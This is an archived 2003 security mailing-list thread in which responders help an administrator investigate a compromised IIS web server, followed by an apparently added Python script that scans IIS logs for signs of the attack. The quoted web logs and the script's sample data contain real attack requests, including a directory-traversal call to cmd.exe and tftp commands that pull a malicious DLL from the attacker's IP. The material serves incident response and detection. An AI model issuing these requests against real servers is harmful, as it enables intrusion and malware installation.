Rogelio, on Nimda.E from Symantec:

This worm is similar in functionality to W32.Nimda.A@mm. Differences
include the modification of file names used by the worm.
The attachment received has been changed to: Sample.exe
The dropped .dll file is now: Httpodbc.dll
The worm now copies itself to the %Windows% folder as Csrss.exe instead
of Mmc.exe

Try looking for c:\winnt\csrss.exe for the virus.

Also, this isn't where the ncx99.exe came from. I'd do a thorough search for
any usage of cmd.exe/root.exe in your web logs and start there, after taking
it offline.

hth,
sunzi

----- Original Message -----
From: "Michael Katz" <mikeat_private>
To: <incidentsat_private>
Cc: "Rogelio Vidaurri Courcelle" <rvidaurriat_private>
Sent: Sunday, January 12, 2003 9:20 PM
Subject: Re: Hacked web server


> At 1/10/2003 12:39 PM, Rogelio Vidaurri Courcelle wrote:
>
> >Hi... my web server (NT 4.0 SP6a) was hacked last Friday
>
> Rogelio,
>
> >200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,
> >125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> >/c+dir,
>
> The above shows that your server is susceptible to a vulnerability detailed
> in Microsoft Security Bulletin MS00-057
> (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp). This
> vulnerability is NOT fixed by Service Pack 6a. You need to install
> additional patches for IIS. When you rebuild the server, you should
> install the cumulative IIS patch described in Microsoft Security Bulletin
> MS02-062 (http://www.microsoft.com/technet/security/bulletin/ms02-062.asp)
>
> >200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,
> >125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> >/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll,
> >200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221,
> >125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> >/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll,
> >200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221,
> >125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
> >/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll,
>
> Your failure to find a virus (httpodbc.dll) on your hard disk may indicate
> that your firewall was configured properly or that antivirus software
> prevented the infected file from being written to your hard disk (if you
> had antivirus software with relatively current definitions). However,
> there are plenty of other bad things that could be on your system that
> attackers could have placed on your system that would not be flagged as
> malware by antivirus software.
>
> >I have read that it could be because of Nimda but I have scanned with
> >the latest pattern and it found no viruses... only a backdoor trojan
> >called ncx99.exe dropped in mailroot\drop\temp
> >by the way, can I delete files inside that folder??? there's a
> >rundlls32.exe... a KEY file, etcetera......
>
> ncx99.exe is most likely a modified version of netcat and is not flagged by
> most antivirus software as malware.
>
> If your machine has been configured this way for two months, you should
> rebuild it and start from scratch. Who knows what attackers may have done
> to your system?
>
>
> Michael Katz
> mikeat_private
> Procinct Security
>
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
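The web-log search sunzi and Michael recommend, written out as an added example (not part of the thread): it parses Microsoft IIS-format log lines, flags traversal and cmd.exe/root.exe requests, notes whether IIS answered 200 (i.e. ran the command), and collects the tftp destination paths to check on disk. The sample log embeds the three entries quoted above plus one constructed benign request; the field order and function names are my assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample in Microsoft IIS log format: the first three lines are the
# entries quoted in the thread, the last one is a made-up benign request.
SAMPLE_LOG = """\
200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\\httpodbc.dll,
200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\\httpodbc.dll,
10.0.0.7, -, 5/01/03, 4:16:00, W3SVC, INGRESOS02, 200.38.152.221, 15, 210, 3120, 200, 0, GET, /index.htm, -,
"""

# Shells the thread says to search the web logs for.
SHELLS = ("cmd.exe", "root.exe")
TFTP_RE = re.compile(r"tftp\s+-i\s+(\S+)\s+get\s+(\S+)\s+(\S+)", re.I)

def normalize(uri):
    """Decode %-escapes twice (unwraps double-encoding) and fold '\\' to '/'."""
    return unquote(unquote(uri)).replace("\\", "/").lower()

def analyze_line(line):
    """Return a finding dict for a suspicious request, or None."""
    fields = [f.strip() for f in line.split(",")]
    if len(fields) < 15:
        return None
    client, date, time_, status = fields[0], fields[2], fields[3], fields[10]
    stem, query = normalize(fields[13]), unquote(fields[14])
    traversal = "/../" in stem
    shell = next((s for s in SHELLS if stem.endswith("/" + s)), None)
    if not (traversal or shell):
        return None
    tftp = TFTP_RE.search(query)
    return {
        "client": client,
        "when": f"{date} {time_}",
        # A 200 means IIS ran the command; 403/404 means the path was blocked.
        "executed": status == "200",
        "traversal": traversal,
        "shell": shell,
        # (source host, file fetched, local path written) when tftp was used
        "tftp": tftp.groups() if tftp else None,
    }

def scan(log_text):
    """Scan a whole log; returns findings in file order."""
    return [f for f in map(analyze_line, log_text.splitlines()) if f]

def dropped_files(findings):
    """Local paths the attacker tried to write via tftp: check these on disk."""
    return sorted({f["tftp"][2] for f in findings if f["tftp"]})
```

Run `scan(SAMPLE_LOG)` against a real log by reading the file instead of the embedded sample; the `executed` flag separates probes the server refused from ones it actually served.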
This archive was generated by hypermail 2b30 : Tue Jan 14 2003 - 16:10:02 PST